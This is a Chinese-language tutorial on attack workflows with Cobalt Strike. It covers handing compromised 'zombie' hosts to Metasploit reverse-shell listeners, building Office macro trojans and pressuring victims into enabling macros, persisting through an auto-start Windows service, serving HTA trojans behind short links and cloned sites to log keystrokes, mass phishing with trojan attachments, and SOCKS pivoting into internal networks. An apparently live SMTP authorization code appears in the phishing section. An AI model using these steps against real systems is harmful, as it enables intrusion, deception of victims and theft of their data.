cs常用功能
0x01. cs结合msf反弹shell
在cs中可以设置添加会话,将与肉鸡的会话转发给msf,这样就可以利用msf中的功能对肉鸡攻击了
在kali中使用命令开启msf
msfconsole
设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.18.40
set lprot 8882
run -j 将监听挂到后台
在cs客户端中新建一个监听器,ip和端口要和msf的保持一致
上线一台机器然后添加会话
可以在msf中看到shell的反弹,但是很快会话就失败了
通过background将会话转到后台 , 然后用msf的其他工具进行攻击
0x02. office宏payload应用
生成ms宏payload
选择监听器,点击生成
拷贝生成后的内容
新建一个word文档,将拷贝的宏木马添加到当前的word文档中
先将宏的安全性降低
工具 ---》 宏 ---》宏 ,输入好宏名和宏的位置后,点击创建
将之前复制的宏木马粘贴到代码中
然后保存,word文档,将文档发给别人
当他点击启用宏的时候他的电脑就会上线了
总结 : 对于新版本的office宏默认是打开的,但是会发出通知,只有当他点击启用宏后,这台主机才能上线,你
可以先告诉他,必须启用宏,要不然显示不出来内容,哈哈哈哈。宏木马和office版本没有关系。
0x03. 生成带服务的木马
默认木马服务器重启后,就不会再上线了,但是带服务的木马即使重启了服务器,还是会上线
Sc create test binpath=c:\test.exe start=auto displayname=test 将test.exe作为一个服务启动
Sc start test
Sc delete test
Sc top test
这种马会自动提权到system
0x04. 信息收集
通过让对方访问网站达到信息收集的目的
生成url
http://192.168.18.40:80/
可以通过https://bitly.com或者http://tool.chinaz.com/tools/dwz.aspx生成url短链接
https://bit.ly/3oYmkub
当别人点击这个网站,你就可以在cs客户端中的应用信息中看到收集的信息了,貌似没有鸟用
0x05. hta网页挂马
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,
就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。
下例代码保存为xx.hta:
<html>
<head>
<title>Title of page</title>
</head>
<body>
This is my first homepage.
<b>This text is bold</b>
</body>
</html>
第一步:生成hta
第二步、使用文件下载
点击开始之后,test.hta文件会自动传到cs下的uploads目录。
复制生成的链接
http://192.168.18.40:80/download/file.ext
也可以去短链接平台生成一个
https://bit.ly/38Vdfws 因为这个url很明显是个带木马的,所以我们可以进行克隆网站,进一步的伪装
第三步、克隆网站
肉鸡操作,用浏览器访问刚才生成的url
http://192.168.18.40/ 用过短连接进一步伪装
然后页面弹出保存就保存,弹出运行就运行,打开cs的web日志可以看到键盘记录,貌似只能记录数字和abc
0x06. 邮件钓鱼
收件人的邮箱地址,可以保存在一个记事本中,一行对应一个目标邮箱,邮件内容可以通过复制qq邮件内容
附件的话一般都是一个压缩包木马,绑定木马的那种,钓鱼地址可以填hta网页马
开启smtp服务的授权码 gpbmdyggygejdcge
邮件钓鱼你想做的好的话,一般都是申请一个国外的邮箱地址,然后还挂个vpn
0x07. Socks代理应用
环境搭建:
win2003上线的机器
- 192网段的,还有一张网卡是172的
win7
- 172网段
默认攻击者是无法攻击172网段的其他机器的,但是如果将肉鸡设置成代理,这样攻击者就能间接的攻击172网段
的机器了,前提是上线的肉鸡有172这个网段的网卡,且能和这个网段的其他机器能够通信
第一步、设置代理端口
第二步、查看已搭建代理
点击之后生成一行代码复制到msf里面运行就可以利用msf远程攻击那个不通的主机
setg Proxies socks4:192.168.18.40:5103
第三步、利用msf模块直接攻击
msfconsole
use auxiliary/scanner/portscan/tcp
set rhost 172.16.0.3 之前不同的主机的ip
run
然后就会扫描到在172网段下的其他机器了,还有一个使用方法是在kali的配置文件修改
然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器,端口为之前生成的随机端口
使用proxychains代理扫描内网主机 proxychains nmap -sP 172.10.1.0/24,目前Socks是用的最多的
内网渗透中先传一个cs木马,在cs中配置一个Socks代理,通过上线的肉鸡攻击内网
0x08. cs提权
提权成功,如果自带的提权没有成功的话,可以手动添加payload,
下载地址:https://github.com/rsmudge/Elevatekit
先下载提权payload
导入提权payload
选择下载的提权payload
0x09. 扫描网段
详情请见:
https://github.com/k8gege/Aggressor
木马功能,鱼叉攻击,免杀,兼容性稳定,拓展模块,读密码,提权,内网渗透,与msf联动,socks代理直接攻
击内网